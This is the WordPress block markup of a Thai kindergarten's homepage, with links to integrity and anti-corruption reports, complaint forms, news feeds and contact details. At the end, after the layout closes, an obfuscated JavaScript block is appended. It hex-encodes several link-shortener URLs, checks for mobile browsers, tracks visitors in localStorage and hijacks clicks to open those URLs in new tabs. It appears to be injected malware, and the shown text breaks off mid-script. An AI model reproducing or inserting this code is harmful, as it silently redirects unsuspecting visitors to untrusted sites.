data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const 